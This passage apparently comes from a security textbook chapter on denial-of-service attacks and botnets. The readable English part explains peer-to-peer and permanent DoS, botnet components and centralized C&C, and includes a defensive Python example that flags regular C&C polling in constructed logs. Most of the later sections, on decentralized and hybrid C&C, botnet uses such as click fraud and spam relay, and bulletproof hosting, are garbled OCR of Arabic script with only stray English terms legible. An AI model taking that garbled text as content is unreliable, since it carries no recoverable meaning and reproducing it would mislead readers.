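With the weak hash all 1024 names land in one bucket and the parser performs 1024*1023/2 comparisons for a 22 KB body; the keyed hash spreads them over the buckets and the count drops by orders of magnitude. Language runtimes fixed this the same way (per-process hash seeds), and frameworks added caps on the number of parameters per request as a second line of defence.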

5. Other Techniques

Peer-to-Peer Attacks

Peer-to-peer attacks abuse the protocols of file-sharing networks instead of a botnet. Attackers have exploited flaws in peer-to-peer software, notably in clients of the DC++ (Direct Connect Protocol) network, to instruct the clients to disconnect from their hub and connect to the victim instead. Tens of thousands of peers then open connections to the victim's web server at once. The machines involved are not infected and the attacker controls no "botnet"; he merely redirects the legitimate traffic of a very large network to a target of his choice.

[Figure: peer-to-peer attack. The attacker redirects User-1, User-2 and the other peers of the file-sharing network toward the victim.]



Permanent Denial-of-Service Attack

Permanent denial-of-service (PDoS), also known as phlashing, refers to attacks that cause irreversible damage to system hardware. Unlike other DoS attacks, it sabotages the hardware itself, so the victim has to replace or reinstall it. The attack is carried out using a method known as "bricking a system": the attacker sends fraudulent hardware updates (firmware images) to the victims, advertised through e-mail, IRC channels, tweets and posted videos. Once the malicious update is executed, the device's firmware is corrupted and it no longer boots. The technique is particularly effective against network equipment and embedded devices whose firmware is rarely verified before installation.

[Figure: permanent DoS. The attacker sends e-mail, IRC chats, tweets and videos with fraudulent content for hardware updates; the attacker gets access to the victim's computer and malicious code is executed on the victim's hardware.]



Zero-Day DDoS Attacks

Zero-day DDoS attacks, sometimes called one-packet-killers, exploit a previously unknown vulnerability in the target's software or protocol stack so that a single packet or a handful of requests crashes the system. They are rare but devastating precisely because no patch or signature exists at the time they are used. Such exploits are traded on the "black market" and are usually spent after one campaign, since once observed they are analysed and patched.



[Figure: taxonomy of DoS attacks. The diagram classifies attacks along the following dimensions.]

Basic types: resource consumption (CPU, memory, I/O bandwidth, disk space, network bandwidth, multiple resources); configuration destruction or alteration; physical destruction or alteration.
Exploited weakness: vulnerability-based DoS; flooding-based DoS.
Attack distribution: single-source DoS; distributed DoS.
Attack target: DoS on application, on operating system, on router, on connection, on link, on infrastructure, on firewalls and IDS; network-layer DoS.
Attack enhancing techniques: reflection; amplification; IP address spoofing.
Attack traffic dynamics: constant rate; variable rate.
Attack impact: disruptive; degrading.



10.5 Botnets

Botnets are the engine behind most DoS and DDoS attacks today, as the previous sections have shown. A botnet is a collection of "zombies", security-compromised systems under the remote control of an attacker, which can be directed to flood a target in unison.




Organized Crime Syndicates

Cyber crime has become a business run by organized groups with defined roles, and botnets are their principal tool. The 2010 Data Breach Investigations Report attributed most of the breaches it studied to organized criminal groups, with hacktivists responsible for a smaller share.

Organized Cyber Crime: Organizational Chart

At the top sits the boss, who runs the operation as a business and keeps away from the technical work. Below him the underboss acts as Trojan provider and manager of the Trojan command and control infrastructure: he supplies the malware and the servers and coordinates the campaigns. Under the underboss, campaign managers each run their own attacks, recruiting affiliation networks of people who distribute the malware and harvest data in return for a share of the proceeds. The stolen data is finally passed to resellers, who monetize it.

[Figure: organizational chart. Criminal Boss; Underboss: Trojan Provider and Manager of Trojan Command and Control; Campaign Managers, each with an Affiliation Network; Stolen Data Resellers.]
Botnet

The word botnet is a contraction of "robot network". The term "bot" is short for "robot", and in computing it refers to a program that performs a task automatically on a user's behalf. Bots are not inherently malicious: in IRC (Internet Relay Chat) channels they answer questions and enforce rules, in first-person shooters (FPS) they play as computer-controlled opponents, and search engines crawl the web with bots. The bots this chapter is concerned with, however, are installed on machines without their owners' knowledge and take orders from an attacker.

A botnet, then, is a network of compromised machines, potentially tens or hundreds of thousands of them, all running such a bot program and all controlled by one party. The owners of the machines usually have no idea that their computers take part. The machines are infected through the usual channels (malicious e-mail attachments, drive-by downloads, worms, pirated software) and, once infected, report to the attacker's control infrastructure and wait for commands.




Note: synonyms for "botnet" include "bot army", "bot herd", "zombie horde" and "zombie network".

The person who controls a botnet is called the botmaster or botherder. Commands reach the bots through the botnet's command and control channel, abbreviated C&C. The C&C infrastructure is the botnet's backbone and also its weakest point: taking it over or cutting it off neutralizes the bots. In 2007, botnets were used in attacks that took the websites of government ministries and agencies offline, and the same machines are routinely used for spam, click fraud and spidering (harvesting) of web content.

A botnet can be summarized by three properties:
"network of compromised machines"
"Can be coordinated remotely"
"Used for malicious activity"

A botnet consists of two components:
"Host component"
"Network component"

Host component

The host component is the malicious agent installed on the compromised machine, the program that turns the machine into a bot. This bot agent runs hidden in the background, usually disguised as a legitimate process or service, and gives the botmaster control over the host; it is the malware component of the botnet. The bot agent connects to the botnet's control infrastructure and must be able to:
"Receive and interpret commands from the botmaster"
"Execute attacks"
"Send data back to the botmaster"

Network component

The network component comprises the servers and channels that tie the bots together:
"Command and control channel"
"Malware distribution server"
"Drop zone"

Command and control channel

The command and control (C&C) channel is the path over which the botmaster issues orders to the bots and receives their reports. C&C is the heart of the botnet: without it the bots are isolated and harmless, and it is what distinguishes a botnet from other malware. Because it is also the single point of failure, botmasters protect the C&C servers and channels carefully. The terminology follows the structure: the C&C channel is the communication path, the C&C server is the machine the bots talk to, and C&C traffic is the traffic on that channel.

Malware distribution server

The malware distribution server hosts the bot agent and its updates and components, so that newly infected machines can download the full payload and existing bots can be upgraded. It may also host the exploit pages or files used to infect new victims.

Drop zone

The drop zone is the server to which bots upload what they steal: credentials, financial data, documents and other information.
C&C Structure

The C&C structure describes how commands get from the botmaster to the bots and how the bots report back. There are three types:
"Centralized"
"Decentralized"
"Hybrid"

A. Centralized C&C Structure

A centralized structure has one central node that hands out commands; the bot master connects to it and the bots are configured to connect to it as well. The central node is usually an IRC server or a web server operated or hired by the bot master. Within the centralized structure, commands are delivered in one of two styles:
"Push style"
"Pull style"

In a push-style centralized C&C structure the bot agent receives its orders as soon as the bot master issues them. The bots keep a persistent connection to the C&C server and are always listening, so the botmaster can react in real time. IRC-based C&C is the classic example: the bots log in to an IRC server and join a channel, the bot master posts a command in the channel, and every bot receives it at once and responds there.

[Figure: IRC C&C. (1) The bot master posts a command to the IRC C&C server. (2) Bot 1 through Bot n, all logged in to the IRC server, receive the command in real time. (3) Each bot sends its response.]

In the pull-style centralized structure the bots take the initiative: they periodically connect to the C&C server and fetch whatever instructions have been posted since their last visit. The bot master does not address the bots directly; he publishes commands on the server and the bots collect them on their own schedule. The delay between posting and execution depends on the polling interval, which the botmaster shortens when he needs faster response. HTTP-based C&C is the common pull-style form: the bots send HTTP requests to the C&C web server, typically indistinguishable from ordinary web traffic, and receive their orders in the "HTTP response".
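Pull-style C&C leaves a footprint that push-style IRC does not: the bot contacts the same server at a fixed interval, whereas a person browsing is bursty. The example below is added here and is not the book's code; it groups connection records by (source, destination, port) and flags flows whose gaps between connections have a very low coefficient of variation. The log lines are constructed, and the field layout ("timestamp src dst dport bytes") is an assumption about the sensor producing them.

```python
"""Spotting pull-style C&C polling in connection logs. Added example, not the
page's own code. Bots that fetch commands poll at a fixed interval; legitimate
browsing is bursty. Log lines are constructed; the field layout is assumed.
"""
from collections import defaultdict
from statistics import mean, pstdev
from typing import Dict, Iterable, List, Tuple

Flow = Tuple[str, str, int]   # (src, dst, dport)


def parse_line(line: str) -> Tuple[float, Flow]:
    ts, src, dst, dport, _bytes = line.split()
    return float(ts), (src, dst, int(dport))


def beacon_candidates(lines: Iterable[str], min_events: int = 6,
                      max_cv: float = 0.15) -> Dict[Flow, float]:
    """Flows whose inter-connection gaps are nearly constant: coefficient of
    variation (stdev / mean of the gaps) at or below max_cv. Returns the mean
    polling interval in seconds for each candidate."""
    times: Dict[Flow, List[float]] = defaultdict(list)
    for line in lines:
        ts, flow = parse_line(line)
        times[flow].append(ts)
    out: Dict[Flow, float] = {}
    for flow, ts_list in times.items():
        if len(ts_list) < min_events:
            continue                       # too few events to judge
        ts_list.sort()
        gaps = [b - a for a, b in zip(ts_list, ts_list[1:])]
        if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= max_cv:
            out[flow] = mean(gaps)
    return out


def constructed_log() -> List[str]:
    lines: List[str] = []
    # Bot polling its HTTP C&C every 300 s with a few seconds of jitter.
    t = 1_700_000_000.0
    for jitter in (0, 2, -3, 1, 4, -2, 0, 3, -1, 2):
        t += 300 + jitter
        lines.append(f"{t:.0f} 10.0.0.23 203.0.113.9 80 512")
    # A person browsing the same site the same number of times, irregularly.
    t = 1_700_000_000.0
    for gap in (5, 90, 7, 600, 12, 2400, 30, 4, 1800, 45):
        t += gap
        lines.append(f"{t:.0f} 10.0.0.40 203.0.113.50 443 8192")
    # Too few events to judge.
    lines += [f"{1_700_000_000 + 60 * i} 10.0.0.41 203.0.113.51 443 300" for i in range(3)]
    return lines


if __name__ == "__main__":
    for flow, interval in beacon_candidates(constructed_log()).items():
        print(f"{flow[0]} -> {flow[1]}:{flow[2]} polls every {interval:.0f}s")
```

Real bots add jitter precisely to defeat this check, so in practice the threshold is tuned per environment and the result is combined with other signals (small, near-identical response sizes, requests outside working hours, destinations with no business relationship); the example shows the core statistic, not a complete detector.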
"Decentralized C&C Structure" 4 J*>3UI C&C <J%* * 

Jc t . up ^j£| jj tgjli tajbVI 4-1 J£^J ^JaLuijll ;LI j^ll ,jjA*JI j3 jj CjIj jjj Jl j-a 4j j^jxJl C&C cl)^ J^ J^ 

V <JaHjujj jl C&C Jj J J^ 3 J ^? ( : * .dltj jJj J <jj£j-a JJja <Jaij Ljajl j& (J j^J-^l C&C (jl .Clilj jJjJI 

^.1 tilU& jj^j J j£J j tl^L^c J 6j-<iLaui Jl jj V CjIj jjjjll j>* <jj±kjj CjU j£-<JI jl el li^ /o^jlill ^Lgj^c. CjIj jjjjll <J*^3 <— * "cJa*^ 

j-a jIj£j3I ^a^J 6^.1 j 4<j JJ* J^l C&C <J^& I J^^P" I^A dljjjjVI j-aj^a (ilj^jj /o^J^aJl j-al jVI 4_A»JaJj 1 frjlc jLjjulJ 

j^Ul C&C ^ J%J> liA ^ j^j .C&C J ^ ^ 
liA .^ijt jikJI CjVI y-A "nodes" ^Jl .J^l j f^l C&C i> l£ <j^ lU*j "nodes" ^Jl <cs j£ C&C ^ J 

Jc SjIaJjuJl A j£ aJ Cj Jl ^Jjojj .Ul jLjJal ( . UjujJ Vj CjIj jJjJI <Jj£j V 6^.1 j C&C * ^* r - JaLLail .dltj jjjjll (JJoil 4_jj£j^3l ^ lafljll jJj 

."peer-to-peer (P2P) botnet network" ^ J^ ^£jA> ^-^5 ^^>S l£ j* j^^UI C&C .lSj^I ^ t> ^jijjfl 

mL g j^JxJl C&C ^li ^J jJjjll J^l c> lU*^ jJl *^LjaJl Jjjllill <-o jlift jj£I Ig-Lt^J P2P ^ItjiVi 

^ jtnai jl ^ j^Vl ^1 <> P2P client ^ ^^Jl lSj^j c> ^^m^l P2P CjULJI J^Uj ;P2P CjUwIuuI 
cj! j Loiioa l ^ij ^ij jlSaJI t^UI ^j^il P2P client c> '7*^ index" ^1^1 j^>» ^vimj j .^Ijiall P2P client 
cilli Asu j^»jj .^^UIojVI ^5^^ jl L_aLJI jj^l ^ P2P jj^ 4-j ji^xJI ^1^31 jc^ "peer queries" ^^jJI 
^j^j o^lcl .P2P J jjj Jc bUuel liUi j '"peers" eft Cy* ^jI jJj jl '"peer" ^jIjSI ^jjSI l_j jUa^ll c aUl 

.P2P client c> ^ ^ ^l^UaSlI 

. JjLuijJ) j Cj j^all JH2 Luajj ^Vmn l^JI Cjja .Cjlil^l JjLu uJU Jl ^j^Sfl CjUIjIIuuVI o-a ^^lSI Ajil P2Pl^a J*A* 

g- IjjVi Jl P2P Botnet ^ o^j :P2P Botnet e 1 ^ 1 
(Those that use the existing P2P network) <JUJI P2P ^^ki^i ^1 ^ 0 
(Those that build their own P2P network) 3-^UJI P2P a£j^ ^jjj ^1 tStts 0 
.leeching P2P botnet j parasite P2P botnet ^ J) c5 j^Vl ^ ^<\v^ aJUJI P2P Cjllui ^^kl^i ^1 P2P Botnet 
dAj jJI leeching P2P botnet J ti^Ull P2P a py™ ^ ^ 5^ ^parasite P2P botnet J 

^parasite P2P botnet J .yuJI P2P <^ J^b JaSa u^J j ^ j^VI J u .^ ' ^" 1 ^ u j^ ' ^ c> c?^ uj^ u' 
l>«j leeching P2P botnet J ^? 6 P2P c> * ^ ^ ^jJI <jj!^ jj> bootstrapping 

.P2P ^ Jl ^U^j^U bootstrapping Jj ^ ^ P2P *£*5 c> U> V Jll ^U jJl 

.P2P iS^A J! ?^^VI ^ bootstrapping ;&j*1a 
V Bot-only P2P botnet bot-only P2P botnets ^4 P2P ^ cjf 5 J 31 P2P Botnet 

jl j^JaJ liA .<j^aUJl ^^jjj <jli ttilli j-a V^J . J^Vl ^jl lij tfrla ft^liluiVI j^J <jl j^ ^ Jl J^ 6<ajU3I P2P Cjtlui Jc^ 

.P2P ^J>" ^ >^r*t SAi^ jll ^ CjIj jj3I 

:^j£j4!iUl C&C J jaljSfl >^ O^J^ J^ W^J >^ 

."Push" mj^' -
."Pull"^-!iM>i -
fj jx»j tdjjjJI j^ a^j^» J CjjJI ^ j^Vl cj^"bot master" ^ Jl ^ ^ 'P2P C&C ^ J "push" ^1 sj^>l J 

tlgJ SjjLa^lt ^jlj3) j* Jj ^J^j) ^Ic-V j^djlj jjjlldll ^aJ .IgJ jjl^Jl <i!j£l Jl ^aLdVI Jl J-«l jVI ^i^J dj Jl ^ jSj 

jj£j ftjjU^JI jljSVI jV ^ Jaj c5j^VI CjIj Jl Jl j-ol jVI jl ^ill li^i ^ jll 4-jjJI .lj^ J 
JfllS ttilli Jl AiLjaVU -C 5 j£jJI C&C J ^«^l S- 3 j^J <jjILJIj dj Jl ,jj.uJ JjiaJI diajll ^ SjUj>h\I jc^ AxJI J£ S^isu 
j^ j^ ^U^l cilLj ^ili j leeching P2P botnet j parasite P2P botnet £ Jl J j t J^xj 4J ^ j^l jVl 

^ajL (5^1 dj Jl jli ; jjJC JjoJI f \ - ^ 1 jjj dj jjll ^Uiacl Jl J-aljV! ^J^. jJ ^JJ jl jUuiaj (Jjlastjll < . llaal .A^JjuJl J f 1 - ^aC>l£ 

J J^Ja^ ^— * Jl ^U Jl .I^jc lai Jl j ^IxlaiVlj a£jjoJI J c5^>^^^ J^ J 3 ^ J lajjoLo J^-g L_aLd ^jujI cJ-^^ ^y^^ 

Jil P2P o* * j& JllJI djl jl£ lil ."Forward bot" j^>^l o* 

CjULJI dlaall ^cjIjj 

j j j^Vl jji^j ^jj Jj^ .cJ^»l Jl <jjja "in-band message" Jl j^ j^jJ^ cJ^ j* l^l^i^l c5 

cJ^U. . ^^IxJl P2P ^J^J <^jUl« JJJ^I ^J^ jV l^JC ^li^l L-Jxj ^aJj iiiiill 4 ^ ui <Ljla3l d^A . Jllftll dllj Jl l^£a j£<»J ijlj JaSfl 

.cjLoj jjjill ^iljj j^ c -a->- ^ l j^ 3 ^ U^!^ 6 "out-band message" <a Jl W^j] ^ J^ Jj^JI 
dAJiA "out-band message" JjI— 'j W i4 n\\h\ \ P2P jj>> ^ "in-band message" : <Qaja±4

.P2P jjj* 

^j]| j (jjjj^il! J Cjtj JJjjJl ^1 J» Jc ^ dj^liuaj glj-^l <iaLaUJ dj jJl ,1Loj ^jL ^P2P C&C J "pilll" ( : ^ M J^' J 

dltj ^Jl \ g 1C C—L^JJ C_fl jjul (JJ^-Il ^5 jl I SJj a\\ S-UjuiVI 0 jlA .(JjjlgJl ^aJ5 jl 1 SJjud^Q 6 ^ ^ all S-UjoiVI ;J J ^ l^J^jLuUi ^JJ 

S-Luijlj ^J^J L- jjoj t^-aljVI ft^A L-L^j nJ jl CjIj ^Jl (Jj^a^J (jl (J^.1 .6*11*1^. ^)-aljl J^ (J jj^a^ll *L^U UJ-^3 U,ljc alalia (J£joiJ 

4_LtLJI '"^^ i Jl u^J^*^ . j^j*^ j-*^ C5^^ '"^^ 1 ; <iajjj-<JI (jjjl^SI ^jSj CjliLJI s-UjujI ^jc <J^-^ CjU^tIuiI 

Jc J^l l—L^ uJl £>i& L-L^uoi 4 lal uUJ lIiaIsUjojI jll CjIj jJ3 (j^J <j-G .l—bftlxlail jll dltj Jill A^lxla) V I (j^X^-JJ L_fl ^jol 

,CJ Jill AJjuJ <Jj3 (j-Q Cjj^j^ ^31 j-ol jVI 

"Hybrid C&C Structure" 0^ C&C 4- 

^ j^j^ tSj^^j I j^j^ .AlnfiJI ^-al^&l ^jj'q^'^ ~* • uj j J U (j-<» Uata qjAslLj^ djjlijVI ^^a^)^ ^jli t^a jl* j& U£ 
<j-*aja S^LjJ tilli . j^-VI (j-a JjJaal C&C j uj^ ^ ^ m ^ l_a jjla Jla J ^1 ^-^jl ' .l$ j^j**^ j lS j^y^ cJ^^I *\ 
f ikiuij ^11 5JlftVl ^1 .c5 j^^^Ulj <j j^^JI C&C - ikiuij g II C&C \:° v; ; j^a^I^I ^li tcijlj jjjjII 

.ZeusP2P/Murofet combo > j^l C&C 
JSja ^^lun ^ill j t^lii^VI C&C J) 'peers ^ Jl^VI J^a ^ j c^^l C&C ^ P2P ^ jjjJI ^ 

a ikluLj c^j^j^l ^ ULuj 6 1 ^ ^ J Iklualj C&C ^ 6Jj^Ua3I jL^ajVI (>» V^J <jl . O^J .L? C&C 

^ j^J 15 e% (DGA) domain generation algorithm ^ ot* c> ^ ^ c> ^ 

.^^lill ^LuoaVl J ^jj^ ^ > o ?DGA j& ^ / ; J 1 u ^ 2^^^ J 



(BOTNET USAGE) 

(joaJ 6^.1 j 31^ . Jxull tlijj jJI .S ji jj£I pj^al UK tcilllA ji& UK dii^ .4ijlgJI jI^VI yi ^ diii jJI S j£ .AjAaMI ^faJl 

I^A AjU ^)^l (_^^ll (jl J)J*sll JalLojl (j^J 1 \ A^Xj b^AJLlulA ^ (j^l J 6^"lc^l ^.^t^^ ^j-d ^)^l 

."botnet" j^jj^ ^- ui ^ ^^^Jl (3flaijj ,^1 jll c v^\l ^ cJ^j J-^l j > ^1 c^-^- j * "j ^ 

.dluflj uaIajjj jbljil di^j (jj%i jjt py^W CjU djj jJl (jjluaL 4^^L uaII CjLaa^JI ^ (JJ^au^IaII (jjo^^j oti ;Aia^^U 

til^ldl Jid 4Jla ttilli Jl 4iU^VU . u>» (j^5 ^3 Jll ^lg-^l ^bl oj^la ^lg-<Jl t<^H<JI ^jjjujUJI oj^ll ^ 4_ix£3l 

^bV (j^uJI (> cjIjjjjjII J ^i^jll Jc^ s j^ll ciik^ "computing cloud infrastructure" ^?U^JI aji^W aSiA\ 

• Jj U "bots" 1 j^l > ^ ^ ^ ^b^'^'iU iaaa <JUi ^31 ^Ig^JI 

."DDoS" <^^JI c> u^j^^ CjU^jfc 

"Click fraud" J^VI ^1 J± - 
."Spam relay" gc- ^j^^ 
."Pay-per-install agent" J^jJI ^ - 
."Large-scale information harvesting" ^ j $^ ^ ^ 

."Information processing" CjUjkJI <^JU* 



M DDOS" jj-^l ^-^1 <> 0 U J^t ^U^Jt 

(Jjujj (jl (j^J A^-lj fl^A c V^lun Cj jJI ^j>» (jj^a^ .(DDoS) ^ j^*^^ 4_xiAiJl (j>» (jU^pJ! CA 4_JUi j5^lj (jJ^jLauJl jj£I 

; JU3I J£j^1I J UjIj U£ j^JI liA J UUuJall ^ ^j^l JxilU ^Ua 



4-uIa ^^Lua

[Figure: DDoS attack launched through a botnet. Labels: VICTIM 1 (The Compromised Machines), VICTIM 2 (The DDoS Target), C&C, Bots, Target]

"CLICK FRAUD" J^VI cAJi 

(Jtj!^.V! CjI jib ^g-^nij L« 11a j ^^ia^I^aII JaJI ^ dAj^lcVI Jjjs jaiU p^-^ jj V liLJ j^a jjuJ cj jA\ j>* l_aWI 4_ia jj j* 

.dujjjVl jj iW *ll ^jjjjujUJI j .clujijyi ^j^xJ JLJI Jlii^l ^jjujI <^a &1a "Click Fraud" 

(J^ic-Vi jajIi ^ lii .ciiaJi ^Hjj ^si ^ji C5 ic djU^icVi ^5!^ Djii jsj ^^iiu (jj^jij cujjjVI C5 ic j^i« *ii 

^Jc jilll lil j^Jj . Jl j-*VI *>1a J£ c^c- J 1 CijjjjV! l_ laall ^1 j-d jli ;4_loujj3I CjIaKII jc l_ laall 4_iLgc j!)tk j^Ja 4JV 

j^/lcVI L-jbauji £Lx»U^)J (J^lk j* £^1 jJ ^JJ Li S^lc j>Jl L-LaL ^ cJ 1 "^J* tdjjljVl c _ 5 Jc Li ^ J^- J* j^^-VI 

j* 4iii^a -lafl^j ^L jJI ^^L» tcilli j* -( *iJI c> XlOO V L-i^L^a affiliation program" 

a! jac o-^^ 10,000 <>j^ j <*V X < <*i^ <^j5jVI ^ jjul**!! "^Ijfcll i> 100*000 4jj X ^ 
Jl£j^l j* J£^ JxilU j$i t^UjJI ja ^ j^ JUJI ^i^ ^jj <j| lAc. Si* j "ad affiliation program" u^V^ ^jLoaliVI j^^jj 

.cilll A\ ^ ja. jxJI (jc <aJU3l c _^c jJj (Ja.^31 j) jAij ^lajaJI C5 ic jV Jl j^VI 

.Yahoo! Affiliatesj Google adSense a^^V^ ^^"Vl ^Ijj ^ JSI jt ^lj ^ ^j^l £ j^j .^^Vl 

L_fl jjoj liA j .CljjljVI (^^ic ^^ic 6^ ja. djlj!>lcVI ji^l^ J laJ > o diaJ ^^1 dj jJl ^LujjU ^ajlj 6^.^^ J£ (j^*^ 

jai La£j 4 liA . jAU jl (J^- LS^^A 3 ^^1 f"" ' " 6 W AjuUII CjI^jjuoII l^lajj .djjJjVI <ajjuj ^^Jc A\ JjS j>» ^iJl ^1 L$^J$ 

. Jl j-^VI JjuasJ aL.>.»j JxilU jA cILLuj 



"SPAM RELAY" £&>2I AsjJ) 

^j^)JI JIjujjI jl£ t JjS .spambots cg^^ 5^ ^^)^ *^ L - J ^ 6 ^ .f j - ^^ ^^)^^ u -0 j^l 

£tC j>Jl ^^>JI J^Jjj ^ <L^)ia3l D^A j>Jl ^^>JI ^^^iuJJ-d J 111 L " ^ jIaxJI CjWI JJ5 ^^C jl ^a.lj ^>l lalLujl J ^tC^<Jl 

Aijjia ^J| jj^,liaj "Spammer" 2^*3^ ^j^^ cg^J^ ^'^ Mi j ^ u^j j v ^U^l (j^j aj] ^1 AiLjaVU tAJUi ci lou] 

.diii jJl J^c 4j3 (_^ilt jla>JI jA liA .^cc j-<Jl ^JjJl JLujjV o^J^a. 

:bt>lt ^> jjjxi) Jjj "Spam Relay" ^j^JI 4rfj#M J^-J 1 ^j^t ^l^a^l
."The identities of the spammers can be hidden" lUj^I <^laa.j
."The identities of the spammers can be hidden" ^>JI ^j^l j^i^ ^si J j^im^ l ^> jjSj

. jjill ^^Ic JaUi jl ^1 ^cC^<Jl ^^>JI j>» Cjl-LaSJ ^lauij ^^^jlill (jUaill ^jiajCj 4_iJjjujlaJl 6j^a3l jx» Jlc jSl jj 

^AiliLJI ^1^1 ^bU ^jii ^1 CjIjjJI jjj jjUjlU "spamming process" j^3^l ^j^l J^ jl ^ u' 
Iaa ^AjjjiaJI g&y*l\ ^jJI JjIwjj ^UijV ^lg-^1 ^1 j.^a Ur > aj^j JaVI ajJ "spam campaign" ^3^^ cJ^ 
AijUaxJI iaxu ~i iklujl j ^cc^^^ c^jj^V^ ^J^^ t * a -^^ "antispam" (^Js2l\ ^jJI <ail^<> J jla. ^jja U^aJ J1<»j l^i*aj 

:^a j^iUJI d^a ."pattern matching" 



https://www.facebook.com/tibea2004 
"Senders list" u^j^> -
"Receivers list" u jV^" 1 ^ 4^ta 
"Message template" JIS - 
c> "Spamming" ±*jp>jA\ <^jj£WI Au^' cB-^j) "Spammer" <^>^ ^jJt yr^J* 'g^' <-£^l ^ 

J W*^ <4j "spam campaign" <^>J1 4l*aJI j^Uc ^ cSj^Vl ^tacVI CjULj jJjVl .botnet's C&C 

j^u^ ^I^l.Ij ±jA\ spambots f j% .botnet's C&C i> spambots <> 

■g^j-^l grbj^^ Au^' JLujjI l^j ^ "spam campaign"^ 



[Figure: spam relay through a botnet. Labels: (1) Initiate Spam Command; (2) Initiate Spam Command and Configuration Files; SpamBot 2; SpamBot 4; (4) Send Large Number of Spam E-mails]



j^a tC^jjajjjljU ^ jjjiS] Uaj .Rustock botnet gr* s J^ 1 5^ (^jj^VI ^j^l t> 
JUj] ^ s jjISj spambots jj^ f j2 ^j^J^ ^Vl <> ujJ* <> l^jL U J Rustock botnet s aSjIlJI 

."PAY-PER-INSTALL AGENT" JA» ftklf 

.(Installation of legitimate software) ^ijJi s^j^ 

.(Installation of legitimate software) ^in^JI £jLa^jjll s^j^ 

cAZj .201 1 <^ C5* USENIX Security ^ j (PPI) Pay-Per-Install Agent c> ^ ^ ^ ^ 

<j*l£ 6 jj^W^ u'j^ *jj£ ls^j '"Measuring Pay-per-Install: The Commoditization of Malware Distribution"

; ( _ 5 JU1( <j!>tk ^j-d IfrliAaj (j^j .(jjjuo^lj (jj^ j ^jl jj > >n t jj^)^. 

https://www.usenix.org/legacy/events/sec11/tech/full_papers/Caballero.pdf

(Installation of legitimate software) 

4^jjuo3l JjS ^glc (Jj^^J ^ ^<JI li^ L-L^L^a / alia t flj > . CljjljVI 4£jjoi (^^Jc cd3 ^ uj cJ^^ 

(Installation of legitimate software) ^imJ) cjU^jJ) ^ 
DjLiJI ^1 jA\ jajj jl l^jLi ^> ^j3Ij 4^hA\ ^131 j& Deployment provider .deployment provider ^jJ' 



cljVVI iy> L_flVVI (jlaJ Cj jJ! ^jjoj Ikij "malware deployed" uj^ > *N

jl^. jl 4£jjud3l aU^ ^ LlufLill aJJ > 0 <jl£ lil LoC j <lnaJl CjLi^GjJl JjuU aJJ > 0 L— Ll^ Jj <j£ (j-G C allk-j <Ld,lk]| (ja! \ gjlr. dl±L<Jl 

CjLi^XiJil] a^L^. (jj^J ^ D^lc i^jASUd £jj JA ^JA SjLjajl £LX»!ji3l C-LUJJj (Jj>^j3 Cjlj Jill ^Ujdjl AJaLudJJ (j^J ^— J J^l *lbol .(J jlJl JJ JA1a£ 

tjij^ AiuaJ) cjL^jJI ( *jja jl "botnet's spam relay" gc-j*^ l>* '^UIojVI j& j^J jLjI .4-i^uJaJI jt$j> AlnaJ) 

.(Jj-o^jII £3 ja (Jj3 ^ja aIaa^j! 4_L^aj jl 

"Large-Scale Information Harvesting" J^aj ^ cjU^^a]) ±^ 

lifc 4-1^. JJ .CjLg jlxJl I jSjLaJ <J-G Cj^L^. t ■ UjuJI J& .dljjjjVl (^J^J CjUUill (JA L-l&i ASi Lq (jj^J (jl (j£-<uJl (j-a AijIkJI 

.IgjL^a J a^I g all a J^ l£^>^ l — ^ J^*-^ J' 6 (3^^J ( ** d ^ UJ^ U' ^ jl*^ll AijjJuJ ^jjjLujVI j& ojLjajl ^cxil Jill ^ jill 

^Jj^l CjWI (jJJ^^UJl <Jj L_flWI dill* CjU» jLlxJI 4ijjjal C5 ic SjAslI tdllj Jill JJ^-la O^J JJ* > ^> ^I^C-j <^i a±1 U» 6^lc 

^CljJjjjVI <^-<<»J^-a 1 ^-aIo j laJ i oj JatLaiVI ^ s * L>^ AJi^ <3j^)jaa>Jl CjLd jlx-<Jl L_JJ^)jaaJ (j^J t^Jjoilill aA*J I^Jajj J 

CjLg jIx-aII AijjaiJ l^ij L_fl jjuj l^-jli tl^Lxij j diUi jlx-<Jl (JjIjuj (jj^ ^n/n aIj q\ >1^^aj .PPI agent l!^-^- ^'^^ (J^ 1 ^ (jj^J 

"Information Processing" cjUjk*]) 4^JU-a 

^j^^JI 'O^^ c> Aj^j W^l "attacker's malicious cloud" ^W^^ 

^-^.>.>ilirj| 6 jail J^l^. (j-d AijSLxJ (jjstlauJl dlS jll ^jn'qj <Jjoj j^JI JiLd J J^. j . JjuJI 



"Botnet Protective Mechanisms" ^j^jj 2 * 

Bulletproof hosting 
Dynamic DNS - 
Fast fluxing 
Domain fluxing 

^j^Vl dAi jUl ^ ^1 jl£ lil AjV ^C&C L>^ U^J ^ ^ Uiajl ^ c5j^Vl dilj jJjjl! CjU j£<» 

Jl jj V dj jJ! ^jjuj ^jV l^A .4 alia a <£jjuj ^jj-g Al^iajajV CjIj jJ! (Jjj^j o^lcl ^ Ll i mjj (j^J CIj jJl ^jjuj (jli toja jj>» jjc. gaj 

i( jVl Asu Cj jJI Jj^al jil (jjiA^lg^ll Aiijia cilUfc (Jjj^ C&C ^ O^J 'C&C L)^ ^ t° J^'j^J 

Bulletproof Hosting 

ia jjj^j l^J j ^ AiLjaloaVl Cjl£jJj £jja^i t'^lc . jj^> ^s^i^ ^ > djl£jJj l^^j c _^j3I <-<iAkJI c _^a Bulletproof hosting 

^LijllaJl jlaixJl A-ia. jj aIjj L-jLoi^JI (J^iLlj aJJ cJa Jj^^ (ill^ljlj aIS a^JjouJI ( jl > >ia ^^ic JjlxJl ^ lit .Aj-gI ja.] jl Almk ^jial JC-V 

l-j! uiaJl l. LaL j j£ iaia j-<iVl (jli 4*L<iAiJI ia jj^j ^J ^> c>« ^c. jll ^^ic Bulletproof hosting .^^^^^13 

Bulletproof hosting ^^V^? .Bulletproof hosting <aU^VI (>j ^ jij UJIL d^jjj bjjii aUUI 

j^ll 1^. Bulletproof hosting Ail > ^ >» i l ^ Jx^j li^j ^iii^ ^ jll J ^ (jjlxiU j^ Jil 
tiL* J U the Russian Business Network (RBN) ^ Bulletproof hosting AiLiaU ^SL* <> 1^1 j

^tc j^JI .iijJI ^al j-<ij '"Phishing site" ^>VI ^al j-<JI j t^ni^ll ^l^JI ^il j-<* Ail > > uL la jj*-* RBN jj jf^j^ 

.dlL^Jfe (jJJ lalSalo ^f^al j tdljjljyi ^aj^a! ti^La Cllaaj^a) Lo <jlc jjuj j .4_i^LVI £§1 jaJI j '"spCWl Hosts" 

Jll jl^LSI tilti J jjjl ja cSBja dijlS jl .Liul ja (jfki V dii^ ^ jUJI J Bulletproof hosting Jj > >»^n* IiLujjj 

